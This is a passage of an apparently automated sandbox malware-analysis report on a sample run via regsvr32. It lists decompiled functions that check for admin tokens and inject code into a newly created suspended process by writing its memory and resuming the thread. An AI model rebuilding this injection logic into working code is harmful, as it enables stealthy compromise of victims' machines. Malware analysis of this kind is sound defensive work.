                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,049EC876,00000000,00000000,?,049EC89F,00001644,?,049EDFCE), ref: 049EC846
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2499131667-0
                                                                                                                                                                        • Opcode ID: cc25cf95cf81aff1d65bfd213c13e13bbb1d3e6ed081c448dc6a6d37a6f0f62f
                                                                                                                                                                        • Instruction ID: 15058b312144e971d793f385e924d992ce09c0134919681cf046d30e294f557b
                                                                                                                                                                        • Opcode Fuzzy Hash: cc25cf95cf81aff1d65bfd213c13e13bbb1d3e6ed081c448dc6a6d37a6f0f62f
                                                                                                                                                                        • Instruction Fuzzy Hash: 700167B2700114BFAB259AA6DD48DBB7FBCEF456A07100579F905E6110E671FD01D7E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 225 49ebc84-49ebcd3 call 49e8d6d * 2 CreateProcessW
                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E049EBC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                        				struct _STARTUPINFOW _v72;
                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                        
                                                                                                                                                                        				E049E8D6D(__edx, 0, 0x10);
                                                                                                                                                                        				E049E8D6D( &_v72, 0, 0x44);
                                                                                                                                                                        				_v72.cb = 0x44;
                                                                                                                                                                        				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				return  ~( ~_t11) - 1;
                                                                                                                                                                        			}






                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 049EBCC6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateProcessmemset
                                                                                                                                                                        • String ID: D
                                                                                                                                                                        • API String ID: 2296119082-2746444292
                                                                                                                                                                        • Opcode ID: 752ee3358b60b0b9a9ad46002af9aac0bd0ae69a70c67eb3a0151aee607dd132
                                                                                                                                                                        • Instruction ID: a230f686e23fbcda2ce1f8b369d580994dde1fffbeabf085b2351671637c9296
                                                                                                                                                                        • Opcode Fuzzy Hash: 752ee3358b60b0b9a9ad46002af9aac0bd0ae69a70c67eb3a0151aee607dd132
                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF065F16402087EF721E6A5DC0AFBF3AACCB81714F500135BB05EB1C0E6A4ED4582B5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 230 49ed804-49ed824 call 49ed6dc 233 49ed82a-49ed849 call 49eb557 230->233 234 49ed955-49ed958 230->234 237 49ed84f-49ed851 233->237 238 49ed945-49ed954 call 49e8bf4 233->238 240 49ed857-49ed859 237->240 241 49ed933-49ed943 call 49e8bf4 237->241 238->234 243 49ed85c-49ed85e 240->243 241->238 245 49ed864-49ed883 call 49e8d6d call 49ebc84 243->245 246 49ed921-49ed92d 243->246 252 49ed8e5-49ed8e9 245->252 253 49ed885-49ed898 call 49ed959 245->253 246->237 246->241 254 49ed8eb-49ed8ed 252->254 255 49ed914-49ed91b 252->255 253->252 260 49ed89a-49ed8b2 253->260 257 49ed8fe-49ed90e 254->257 258 49ed8ef-49ed8f5 254->258 255->243 255->246 257->255 258->257 263 49ed8b4-49ed8c9 GetLastError call 49eda57 260->263 264 49ed8e2 260->264 267 49ed8de-49ed8df FindCloseChangeNotification 263->267 268 49ed8cb-49ed8d6 263->268 264->252 267->264 270 49ed8d8 268->270 271 49ed8d9 268->271 270->271 271->267
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E049ED804(intOrPtr __edx) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                        				char _v40;
                                                                                                                                                                        				char _v80;
                                                                                                                                                                        				char _t37;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				void* _t49;
                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				intOrPtr _t86;
                                                                                                                                                                        				char _t87;
                                                                                                                                                                        				void* _t88;
                                                                                                                                                                        
                                                                                                                                                                        				_v16 = _v16 & 0x00000000;
                                                                                                                                                                        				_v20 = __edx;
                                                                                                                                                                        				_t86 = 0;
                                                                                                                                                                        				_t37 = E049ED6DC( &_v16);
                                                                                                                                                                        				_t87 = _t37;
                                                                                                                                                                        				_v24 = _t87;
                                                                                                                                                                        				_t89 = _t87;
                                                                                                                                                                        				if(_t87 == 0) {
                                                                                                                                                                        					return _t37;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t38 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        				_t7 = _t38 + 0xac; // 0x7fc38876
                                                                                                                                                                        				E049EB557( &_v80,  *_t7 + 7, _t89);
                                                                                                                                                                        				_v12 = _v12 & 0;
                                                                                                                                                                        				_t67 = _v16;
                                                                                                                                                                        				if(_t67 == 0) {
                                                                                                                                                                        					L21:
                                                                                                                                                                        					E049E8BF4( &_v24, 0);
                                                                                                                                                                        					return _t86;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(_t86 == 0) {
                                                                                                                                                                        					_t69 = 0;
                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                        					while(_t86 == 0) {
                                                                                                                                                                        						E049E8D6D( &_v40, _t86, 0x10);
                                                                                                                                                                        						_t88 = _t88 + 0xc;
                                                                                                                                                                        						_t49 = E049EBC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
                                                                                                                                                                        						_t94 = _t49;
                                                                                                                                                                        						if(_t49 >= 0) {
                                                                                                                                                                        							_t56 = E049ED959(E049E61C5,  &_v40, _t94, _v20); // executed
                                                                                                                                                                        							if(_t56 != 0) {
                                                                                                                                                                        								_t59 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
                                                                                                                                                                        								if(_t70 != 0) {
                                                                                                                                                                        									GetLastError();
                                                                                                                                                                        									_t62 = E049EDA57( &_v40);
                                                                                                                                                                        									_t63 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        									if(_t62 != 0) {
                                                                                                                                                                        										_push(0xea60);
                                                                                                                                                                        										_push(_t70);
                                                                                                                                                                        										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
                                                                                                                                                                        											_t86 = _t86 + 1;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t63 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        									}
                                                                                                                                                                        									FindCloseChangeNotification(_t70);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t69 = _v8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v40 != 0) {
                                                                                                                                                                        							if(_t86 == 0) {
                                                                                                                                                                        								_t54 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t50 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t50 + 0x30))(_v36);
                                                                                                                                                                        							_t52 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t52 + 0x30))(_v40);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t69 = _t69 + 1;
                                                                                                                                                                        						_v8 = _t69;
                                                                                                                                                                        						if(_t69 < 2) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t67 = _v16;
                                                                                                                                                                        					_t45 = _v12 + 1;
                                                                                                                                                                        					_v12 = _t45;
                                                                                                                                                                        					if(_t45 < _t67) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					do {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					} while (_t67 != 0);
                                                                                                                                                                        					goto L21;
                                                                                                                                                                        				}
                                                                                                                                                                        				L20:
                                                                                                                                                                        				E049E8BF4(_t87, 0xfffffffe);
                                                                                                                                                                        				_t87 = _t87 + 4;
                                                                                                                                                                        				_t67 = _t67 - 1;
                                                                                                                                                                        			}





























                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                          • Part of subcall function 049EBC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 049EBCC6
                                                                                                                                                                          • Part of subcall function 049ED959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 049ED9BB
                                                                                                                                                                          • Part of subcall function 049ED959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 049EDA04
                                                                                                                                                                          • Part of subcall function 049ED959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 049EDA21
                                                                                                                                                                          • Part of subcall function 049ED959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 049EDA42
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000001), ref: 049ED8B4
                                                                                                                                                                          • Part of subcall function 049EDA57: ResumeThread.KERNELBASE(?,049ED8C2,?,?,00000001), ref: 049EDA5F
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 049ED8DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2212882986-0
                                                                                                                                                                        • Opcode ID: e7c2e4670a2e8fafde50f9ac80ae4eb8ebea5e88acbe3bff22e1cb2aba159db4
                                                                                                                                                                        • Instruction ID: 2e44bbb6c1766a7c488fcd8b921eb4ad0f7ffaa1a610babf5ee9a452412289d9
                                                                                                                                                                        • Opcode Fuzzy Hash: e7c2e4670a2e8fafde50f9ac80ae4eb8ebea5e88acbe3bff22e1cb2aba159db4
                                                                                                                                                                        • Instruction Fuzzy Hash: A2414D71A0020AAFDB12DF9AD984EAD77FDFF88314F104275E915A7251DB30AE45CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                        			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                        				WCHAR* _t23;
                                                                                                                                                                        				long _t24;
                                                                                                                                                                        				void* _t28;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        				intOrPtr _t36;
                                                                                                                                                                        				void* _t41;
                                                                                                                                                                        				void* _t48;
                                                                                                                                                                        				intOrPtr* _t49;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				if(_a8 != 1) {
                                                                                                                                                                        					__eflags = _a8;
                                                                                                                                                                        					if(_a8 != 0) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                        						return 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t15 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
                                                                                                                                                                        					L3:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				E049E8BC9();
                                                                                                                                                                        				E049E9591();
                                                                                                                                                                        				 *0x49ff830 = _a4;
                                                                                                                                                                        				E049F3CD5(_a4);
                                                                                                                                                                        				 *_t49 = 0xf43;
                                                                                                                                                                        				 *0x49ff818 = E049EF05C(0x49fca50, 0x138);
                                                                                                                                                                        				 *_t49 = 0x111;
                                                                                                                                                                        				_t23 = E049E9DF2(0x49fca50);
                                                                                                                                                                        				_pop(_t41);
                                                                                                                                                                        				_a8 = _t23;
                                                                                                                                                                        				_t24 = GetFileAttributesW(_t23); // executed
                                                                                                                                                                        				_push( &_a8);
                                                                                                                                                                        				if(_t24 == 0xffffffff) {
                                                                                                                                                                        					E049E8BAF();
                                                                                                                                                                        					 *_t49 = 0x40e;
                                                                                                                                                                        					_t28 = E049E9CB5(E049E109A(_t41));
                                                                                                                                                                        					_a8 = _t28;
                                                                                                                                                                        					__eflags = _t28;
                                                                                                                                                                        					if(_t28 != 0) {
                                                                                                                                                                        						_t48 = 0x54;
                                                                                                                                                                        						 *0x49ff828 = E049EF05C(0x49fcbb8, _t48);
                                                                                                                                                                        						E049E6370(_t48, __eflags);
                                                                                                                                                                        						E049E8BF4( &_a8, 0xfffffffe);
                                                                                                                                                                        						_t36 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                        					_t31 = CreateThread(0, 0, E049E6298, 0, 0,  &_v8);
                                                                                                                                                                        					 *0x49ff83c = _t31;
                                                                                                                                                                        					__eflags = _t31;
                                                                                                                                                                        					if(_t31 == 0) {
                                                                                                                                                                        						goto L3;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				E049E8BAF();
                                                                                                                                                                        				goto L3;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,049E6502), ref: 049E8BD2
                                                                                                                                                                          • Part of subcall function 049EF05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,049FCA50,?,049E652B,?), ref: 049EF07E
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 049E6541
                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,049E6298,00000000,00000000,?), ref: 049E65C8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 607385197-0
                                                                                                                                                                        • Opcode ID: 6821116c3ef122fb5c173cdcb4336c69c2ac400e6b534d7ec5a1c00081c7c202
                                                                                                                                                                        • Instruction ID: e1e363ab7b678cf5a4b4373bde5a8035b1cbc3f3d1dc4e5311780666b7ac5af6
                                                                                                                                                                        • Opcode Fuzzy Hash: 6821116c3ef122fb5c173cdcb4336c69c2ac400e6b534d7ec5a1c00081c7c202
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D2144B1614204AFEB05BF76D805A793BE8EB54314F40853AE51ADA184DF78F940CB55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 308 49ef05c-49ef07c call 49e9dd8 311 49ef07e-49ef084 GetModuleHandleA 308->311 312 49ef086-49ef08b LoadLibraryA 308->312 313 49ef08d-49ef08f 311->313 312->313 314 49ef09e-49ef0ac call 49e8b9c 313->314 315 49ef091-49ef096 call 49ef011 313->315 318 49ef09b-49ef09c 315->318 318->314
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E049EF05C(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _t5;
                                                                                                                                                                        				struct HINSTANCE__* _t7;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                        				_t22 = __edx;
                                                                                                                                                                        				_t5 = E049E9DD8(_a4);
                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                        				_v8 = _t5;
                                                                                                                                                                        				_push(_t5);
                                                                                                                                                                        				if(_a4 != 0xf43) {
                                                                                                                                                                        					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t7 = GetModuleHandleA();
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                                        					_t10 = E049EF011(_t12, _t22, _t7); // executed
                                                                                                                                                                        					_t25 = _t10;
                                                                                                                                                                        				}
                                                                                                                                                                        				E049E8B9C( &_v8);
                                                                                                                                                                        				return _t25;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,049FCA50,?,049E652B,?), ref: 049EF07E
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000,?,?,?,049FCA50,?,049E652B,?), ref: 049EF08B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4133054770-0
                                                                                                                                                                        • Opcode ID: f78a8133417cb12d36f9d230e9ff9f1268a24ae39ca6e928822ab55d2b7ab95f
                                                                                                                                                                        • Instruction ID: 3bfea701f091498c6d5546a8b4407d237c5543c504ffa6fc8474c386803f7a0b
                                                                                                                                                                        • Opcode Fuzzy Hash: f78a8133417cb12d36f9d230e9ff9f1268a24ae39ca6e928822ab55d2b7ab95f
                                                                                                                                                                        • Instruction Fuzzy Hash: C1F0A771304214BBD715AFAAE8448BAB7EDDFC8355714417BF606D3154EAB0EE4086A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 320 49ec8c9-49ec8e8 call 49ec79e 323 49ec8ee-49ec905 call 49ec7f5 320->323 324 49ec983-49ec986 320->324 327 49ec907-49ec928 323->327 328 49ec965-49ec973 FindCloseChangeNotification 323->328 327->328 334 49ec92a-49ec92c 327->334 329 49ec975-49ec980 call 49e8bf4 328->329 330 49ec981 328->330 329->330 330->324 335 49ec92e-49ec931 334->335 336 49ec958-49ec963 334->336 337 49ec934-49ec943 335->337 336->328 340 49ec955-49ec957 337->340 341 49ec945-49ec951 337->341 340->336 341->337 342 49ec953 341->342 342->336
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E049EC8C9(void* __ecx, void* __esi) {
                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				short _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                        				char _t37;
                                                                                                                                                                        				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                        				char _t45;
                                                                                                                                                                        				intOrPtr* _t48;
                                                                                                                                                                        
                                                                                                                                                                        				_t37 = 0;
                                                                                                                                                                        				_v28 = 0x500;
                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_t20 = E049EC79E(__ecx);
                                                                                                                                                                        				_v16 = _t20;
                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                        					_push( &_v24);
                                                                                                                                                                        					_t44 = 2;
                                                                                                                                                                        					_t21 = E049EC7F5(_t44); // executed
                                                                                                                                                                        					_t48 = _t21;
                                                                                                                                                                        					_v20 = _t48;
                                                                                                                                                                        					if(_t48 == 0) {
                                                                                                                                                                        						L10:
                                                                                                                                                                        						FindCloseChangeNotification(_v16);
                                                                                                                                                                        						if(_t48 != 0) {
                                                                                                                                                                        							E049E8BF4( &_v20, _t37);
                                                                                                                                                                        						}
                                                                                                                                                                        						return _t45;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push( &_v12);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0x220);
                                                                                                                                                                        					_push(0x20);
                                                                                                                                                                        					_push(2);
                                                                                                                                                                        					_push( &_v32);
                                                                                                                                                                        					_t29 =  *0x49ff820; // 0x4befaa0
                                                                                                                                                                        					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					if( *_t48 <= 0) {
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t31 =  *0x49ff820; // 0x4befaa0
                                                                                                                                                                        						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                        					_t33 = _t9;
                                                                                                                                                                        					_v8 = _t33;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_push(_v12);
                                                                                                                                                                        						_push( *_t33);
                                                                                                                                                                        						_t34 =  *0x49ff820; // 0x4befaa0
                                                                                                                                                                        						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t37 = _t37 + 1;
                                                                                                                                                                        						_t33 = _v8 + 8;
                                                                                                                                                                        						_v8 = _t33;
                                                                                                                                                                        						if(_t37 <  *_t48) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L9;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t45 = 1;
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t20;
                                                                                                                                                                        			}





















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049EC79E: GetCurrentThread.KERNEL32 ref: 049EC7B1
                                                                                                                                                                          • Part of subcall function 049EC79E: OpenThreadToken.ADVAPI32(00000000,?,?,049EC8E3,00000000,049E0000), ref: 049EC7B8
                                                                                                                                                                          • Part of subcall function 049EC79E: GetLastError.KERNEL32(?,?,049EC8E3,00000000,049E0000), ref: 049EC7BF
                                                                                                                                                                          • Part of subcall function 049EC79E: OpenProcessToken.ADVAPI32(00000000,?,?,049EC8E3,00000000,049E0000), ref: 049EC7E4
                                                                                                                                                                          • Part of subcall function 049EC7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,049E0000,00000000,00000000,?,049EC876,00000000,00000000,?,049EC89F), ref: 049EC810
                                                                                                                                                                          • Part of subcall function 049EC7F5: GetLastError.KERNEL32(?,049EC876,00000000,00000000,?,049EC89F,00001644,?,049EDFCE), ref: 049EC817
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,049E0000), ref: 049EC96D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1806447117-0
                                                                                                                                                                        • Opcode ID: cee8b9ce1b98bb507fa6519468d161bb41e8a110eff5b46c5f93b2f523660d0a
                                                                                                                                                                        • Instruction ID: 7308b01e80b318b8d51e29129d36388fc1465719126df12f0d3a2e08c1421762
                                                                                                                                                                        • Opcode Fuzzy Hash: cee8b9ce1b98bb507fa6519468d161bb41e8a110eff5b46c5f93b2f523660d0a
                                                                                                                                                                        • Instruction Fuzzy Hash: 11214F72A00209AFDB11DFAAD885AAEBBF8FF48710B504479E641E7251D734FA018B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 343 49e6298-49e62b1 call 49e6412 GetOEMCP call 49edf3d 348 49e62b6-49e62e1 call 49f3bd5 343->348 349 49e62b3-49e62b4 343->349 353 49e62eb-49e62f1 call 49ed804 348->353 354 49e62e3-49e62e9 348->354 350 49e632b 349->350 357 49e62f6-49e62fd 353->357 355 49e6305-49e6311 354->355 358 49e6323 call 49e35a1 355->358 359 49e6313-49e6318 call 49e611b 355->359 360 49e62ff 357->360 361 49e631a-49e6321 357->361 365 49e6328-49e632a 358->365 359->365 360->355 361->358 361->365 365->350
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049E6298(void* __fp0) {
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                        				intOrPtr _t17;
                                                                                                                                                                        				intOrPtr _t20;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        
                                                                                                                                                                        				_t32 = __fp0;
                                                                                                                                                                        				E049E6412();
                                                                                                                                                                        				GetOEMCP();
                                                                                                                                                                        				_t13 = E049EDF3D(__fp0); // executed
                                                                                                                                                                        				 *0x49ff81c = _t13;
                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                        					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
                                                                                                                                                                        					_t14 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        					_t2 = _t14 + 0x224; // 0x49e0000
                                                                                                                                                                        					E049F3BD5( *_t2);
                                                                                                                                                                        					_t26 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        					_t25 = _t27;
                                                                                                                                                                        					__eflags =  *(_t26 + 0x1898) & 0x00010000;
                                                                                                                                                                        					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
                                                                                                                                                                        						_t7 = _t26 + 0x224; // 0x49e0000, executed
                                                                                                                                                                        						_t26 =  *_t7;
